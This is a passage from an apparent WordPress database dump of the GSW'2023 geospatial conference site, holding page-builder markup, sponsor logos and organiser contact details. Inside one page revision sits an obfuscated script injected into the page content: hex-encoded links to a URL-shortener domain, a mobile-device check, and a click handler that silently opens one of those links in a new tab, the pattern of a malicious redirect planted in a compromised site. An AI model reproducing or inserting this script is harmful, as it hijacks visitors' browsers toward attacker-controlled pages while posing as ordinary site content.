link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:03:01','2023-08-16 00:03:01','',3066,'https://gsw2023.com/?p=5233',0,'revision','',0),
(5234,1,'2023-08-16 00:04:12','2023-08-16 00:04:12','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Platinum Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px 